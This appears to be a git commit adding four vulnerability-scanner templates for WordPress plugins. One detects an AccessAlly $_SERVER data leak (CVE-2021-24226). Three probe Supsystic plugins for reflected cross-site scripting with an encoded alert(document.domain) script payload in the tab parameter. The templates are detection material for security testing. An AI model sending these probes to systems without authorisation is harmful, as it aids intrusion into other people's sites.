commit
d4eea38bbc
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2021-24226
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24226
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2021-24226
|
||||||
|
cwe-id: CWE-200
|
||||||
|
tags: wordpress,cve,cve2021,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<div id="accessally-testing-data"'
|
||||||
|
condition: and
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2021-24274
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS)
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24274
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-24274
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: wordpress,cve,cve2021,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2021-24275
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS)
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-24275
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: wordpress,cve,cve2021,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2021-24276
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS)
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: medium
|
||||||
|
description: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24276
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-24276
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: wordpress,cve,cve2021,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
Loading…
Reference in New Issue